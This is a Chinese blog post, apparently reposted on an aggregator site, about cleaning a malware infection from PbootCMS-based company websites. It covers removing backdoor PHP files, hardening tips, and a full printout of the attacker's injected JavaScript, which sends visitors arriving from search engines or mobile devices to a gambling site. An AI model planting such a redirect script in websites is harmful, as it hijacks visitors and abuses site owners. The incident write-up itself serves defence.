pbootcms被黑木马问题(3)

news2024/11/15 6:45:28

昨天经过同事告知发现了很早之间做的几个企业官方都中木马了,然后看了一下木马情况,跟之间的两次都有所不同,这里记录一下新的木马的清理过程,有遇到的朋友可以借鉴一下。(之前有做过一些防止批量扫站的措施,因为嫌麻烦就没有给这些网站上进行修改)

1)网站被黑以后的表现形式:

就跟上面显示的一样,被黑以后对方会在首页进行插入一些对方的信息,这里是关于一个体育的灰网的站点,而且这里对方还做了一个小的识别,那就是你直接输入网址或者通过收藏夹进入的都是正常的,但是通过搜索引擎点击进入的就会进行跳转到对方的网站.这里对方使用的是js的方式进行跳转的,后面我们会说。

2)如何进行清理

  1. 下载一个d盾,使用D盾进行扫描php文件(不知道其他类型的可不可以,我这边只是能扫描php后缀的)

  1. 通过扫描我们可以看到关于PHP后缀的文件的一些涉及危险操作的文件,如果你的pb没有进行过二开,也没有使用cms88或者其他人的一些含有加密授权的插件的话,那么除了Kernel.php这个官方文件以外其他的文件都是对方上传的后门文件了,我们要做的就是在d盾中通过右键选择删除的方式进行删除这些后门文件。

  1. 操作完d盾以后我们还需要寻找对方留下的js文件以及html文件,对方会把我们根目录下的index.php给修改的同时还会上传一个m.html类似名称的html文件,这里我们可以根据前面我们清理的后台文件的上传时间得知哪些文件是同一天被修改的,那么我们也就需要删除根目录下的这些文件。删除以后看我们的首页引用的js文件路径是哪里,然后找到对应的目录,看看这些js文件有没有被修改。小编这里遇到的情况都是会有两个js文件被对方加入了两段代码,分别在js文件的开头与结尾,把这个也删除就好了(删除对方加入的代码,不是删除整个js文件,如果你有本地备份直接替换也可以)。

3)针对pb做一些简单的防止被批量扫码的设置。

1.数据库中插入系统的名称,不进行默认显示pbootcms系统的字样

2.把admin.php的文件命名为其他名称,比如xxx.php,这样我们登录的时候就是http://www.371302.cn/xxx.php 的路径了。也能避免一些被扫的风险。

4)说一下对方设置的js跳转的方式,主要是在https://www.xxx.com/bb.js 这个文件中(有时候会放到其他地方,不过js代码是一致的)

在这里打开以后可以看到下面的方法,这里猜想agent_code=5306274'应该就是对方的邀请码之类的或者用于计算佣金的地方。根据被导入到目标网站的次数计算佣金把。

var sp_regexps =
  /.(yahoo|google|baidu|soso|sogou|bing|sou|so|360|haosou|youdao|sooule|easou|aliyun|sina|jike|Yisou|uc|sm)./gi;
var sp_whereis = window.location.referrer;
try {
  sp_whereis = top.document.referrer;
} catch (e) {}
try {
  sp_whereis = window.parent.document.referrer;
} catch (e) {}
var sp_domains = window.location.host;
try {
  sp_domains = top.document.domain;
} catch (e) {}
try {
  sp_domains = window.parent.document.domain;
} catch (e) {}
if (sp_regexps.test(sp_whereis)) {
  window.location.href = 'https://www.xxx.com:9152/?agent_code=5306274';
  parent.window.opener.location = 'https://www.xxx.com:9152/?agent_code=5306274';
}

function browserRedirect() {
  var sUserAgent = navigator.userAgent.toLowerCase();
  var bIsIpad = sUserAgent.match(/ipad/i) == 'ipad';
  var bIsIphoneOs = sUserAgent.match(/iphone os/i) == 'iphone os';
  var bIsMidp = sUserAgent.match(/midp/i) == 'midp';
  var bIsUc7 = sUserAgent.match(/rv:1.2.3.4/i) == 'rv:1.2.3.4';
  var bIsAndroid = sUserAgent.match(/android/i) == 'android';
  var bIsCE = sUserAgent.match(/windows ce/i) == 'windows ce';
  var bIsWM = sUserAgent.match(/windows mobile/i) == 'windows mobile';
  if (!(bIsIphoneOs || bIsMidp || bIsAndroid || bIsCE || bIsWM)) {
  } else {
    window.location.href = 'https://www.xxx.com:9152/?agent_code=5306274';
  }
}
browserRedirect();

var s=document.referrer;
var str=window.location.href;
if(s.indexOf("b"+"ai"+"du")>0 || s.indexOf("s"+"ogou")>0|| s.indexOf("s"+"m")>0 || s.indexOf("360")>0 || s.indexOf("s"+"o")>0|| s.indexOf("go"+"o"+"gle")>0 || s.indexOf("bing")>0  || s.indexOf("youdao")>0 )
window.location.href="https://www.xxx.com:9152/?agent_code=5306274";

以上便是临沂建站分享的有关本次挂马的处理过程,分别从被黑以后的表现形式以及处理过程还有最后的简单防批量扫码三个方面进行处理。最后不得不说的就是人家确实牛逼,15号被挂的马,17号的时候百度上已经被更新成对方的信息了,要是我们自己修改一次信息没有个一个月的时间是更新不出来的。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/359522.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

【Spark分布式内存计算框架——Spark SQL】13. 自定义UDF函数

第七章 自定义UDF函数 无论Hive还是SparkSQL分析处理数据时,往往需要使用函数,SparkSQL模块本身自带很多实现公共功能的函数,在org.apache.spark.sql.functions中。SparkSQL与Hive一样支持定义函数:UDF和UDAF,尤其是U…

黑格尔的实践观探究

(江苏大学马克思主义学院 212000)一、引言人的独特性在于实践活动,以及由实践活动带来的人类社会的不断进化与发展。人类的实践史体现了人的全部本质。但是,人类从理论的高度反思自己的实践活动,尤其是在哲学的层面上进…

【基础算法】之 冒泡排序优化

冒泡排序思想基本思想: 冒泡排序,类似于水中冒泡,较大的数沉下去,较小的数慢慢冒起来(假设从小到大),即为较大的数慢慢往后排,较小的数慢慢往前排。直观表达,每一趟遍历,…

大数据框架之Hadoop:MapReduce(三)MapReduce框架原理——shuffle机制

3.3.1Shuffle机制 Map方法之后,Reduce方法之前的数据处理过程称之为Shuffle。 3.3.2Partition分区 1、问题引出 要求将统计结果按照条件输出到不同文件中(分区)。比如:将统计结果按照手机归属地不同省份输出到不同文件中&#…

2023春季露营投影怎么选?轻薄投影极米Z6X Pro值得推荐

近年来,露营经济在多重因素的共同助推下快速发展,精致露营的攻略开始占据小红书、微博、朋友圈等各类社交平台,吸引着更多用户种草并加入到露营大军中,而露营经济的强势“破圈”给家用智能投影带来了更多的发展契机。凭借着小巧的…

探访上汽通用武汉奥特能超级工厂

上汽通用汽车在电动化和智能网联化新技术领域投入了700亿大洋,武汉奥特能超级工厂就是其中一个重点项目。这个工厂已经投产,将成为上汽通用汽车的新能源生产基地,加速奥特能平台车型的推出。 最近别克推出了Electra E5,它是别克第…

新品BCM6755A1KFEBG/MT7921LE/MT7921AU WiFi芯片

博通在WiFi市场具有相当的实力。在WiFi6上有下面这几个解决方案:型号:BCM6755 BCM6755A1KFEBG类型:四核1.5GHz CPU封装:BGA批次:新BCM6755和BCM6750还是A7架构,更多的用在中低端型号上。BCM6755和BCM6750 C…

Spark 广播变量累加器

广播变量 场景描述:一份数据存在Driver中,但是每个Executor都需要一份。 常规模式下,Driver会给每个分区都发送一份数据。如果在Executor中存在多个分区的情况,那么一个Executor会获得多份数据。 Executor是进程,task…

微信小程序阻止页面返回(包滑动、自动返回键)

这个场景还是挺有意思的,比如某多多,只要你点左上角的返回 好家伙,满满又 花不了 的优惠券就来了,让你拥有一种消费最划算的感觉。 如果你的场景比较简单,只是对左上角的返回进行监听,只需要关闭自带的导航…

16_FreeRTOS队列集

目录 队列集 队列集相关API函数介绍 队列集使用流程 实验源码 队列集 一个队列只允许任务间传递的消息为同一种数据类型,如果需要在任务间传递不同数据类型的消息时,那么就可以使用队列集! 作用:用于对多个队列或信号量进行“监听”其中不管哪一个消息到来,都…

JVM学习笔记四:运行时数据区之虚拟机栈

目录 概述 StackOverflowError测试案例 栈运行原理 栈帧的内部结构 改变栈帧大小的StackOverflowError测试案例 局部变量表 局部变量槽 操作数栈 动态链接 静态链接 动态链接 早期绑定 晚期绑定 方法返回地址 概述 与程序计数器一样,Java虚拟机栈也是…

4665: 求前n项和

描述给定序列&#xff1a;求前n项之和。输入输入数据有多组&#xff0c;第一行为数据的组数t&#xff08;1<t<15&#xff09;。每组数据有一行&#xff0c;每行为一个正整数n&#xff08;n<1000000&#xff09;。输出每组输出前n项的和&#xff0c;保留4位小数。样例输…

【编程入门】应用市场(安卓版)

背景 前面已输出多个系列&#xff1a; 《十余种编程语言做个计算器》 《十余种编程语言写2048小游戏》 《17种编程语言10种排序算法》 《十余种编程语言写博客系统》 《十余种编程语言写云笔记》 《N种编程语言做个记事本》 目标 为编程初学者打造入门学习项目&#xff0c;使…

Jmeter常用断言之BeanShell断言详解

BeanShell断言可以使用beanshell脚本来执行断言检查&#xff0c;可以用于更复杂的个性化需求&#xff0c;使用更灵活&#xff0c;功能更强大&#xff0c;但是要能够熟练使用beanshell脚本 在这里除了可以使用beanshell的内置变量外&#xff0c;主要通过 Failure 和 FailureMess…

es 7.8.0 linux 集群

1. 下载es linux版本的数据包 地址: https://www.elastic.co/cn/downloads/past-releases#elasticsearch 解压: 解压 tar -xzvf xxx 2. 我是在一个服务器上测试的,实际上是不同的服务器 所以复制了三份,模拟多节点 进去之后主要是修改elasticsearch.yml 内容如下 节点一…

关于在VM上的windows server 2022系统安装

目录 1、windows serer 2022安装的准备工作 1&#xff09;下载系统 2&#xff09;寻找对应系统密钥 3&#xff09;配置server系统开机配置项&#xff08;可能会出现sconfig配置界面&#xff09; 2、开始安装server系统 1、windows serer 2022安装的准备工作 1&#xff09;…

Dropout

目录一、Dropout出现的原因二、什么是Dropout&#xff1f;三、为什么Dropout解决过拟合?3.1 取平均的作用3.2 减少神经元间复杂的共适应关系四、实现Dropout—— pytorchexample 1example 2example 3设置dropout参数技巧一、Dropout出现的原因 在机器学习的模型中 如果模型的…

处理窗口的常用API函数及窗口处理经验总结(附源码)

目录 1、检测窗口状态 2、将窗口前置显示 2.1、将窗口拉到最前面显示 2.2、将窗口置顶显示 2.3、将窗口设置到指定窗口的上面 3、将不显示的窗口强行显示出来 4、获取窗口的信息 5、通过窗口信息去查找窗口 5.1、调用GetClassName接口去比对窗口的类名 5.2、调用Find…

清理bib文件(删除重复项,仅保留tex中引用的条目)

在写latex文件的过程中&#xff0c;经常会遇到添加了一堆文献的bibtex到bib文件中&#xff0c;有时候文章一长同一篇文献用不同的cite-key引用了多次&#xff0c;同时也会有一些文献最后并没被正文引用&#xff0c;这就需要对bib文件进行清理。 删除重复项 可以用JabRef 在J…

45岁当打之年再创业,剑指中国版ChatGPT,这位美团联合创始人能否圆梦?

文 BFT机器人 “即便只有一个人&#xff0c;我也要出发。” 这是45岁的前美团联合创始人王慧文再次冲上创业沙场的“征战”宣言&#xff0c;这一次他的梦想是“组队拥抱新时代&#xff0c;打造中国OpenAI”。 01 当打之年&#xff0c; AI新梦再起航 “我的人工智能宣言&…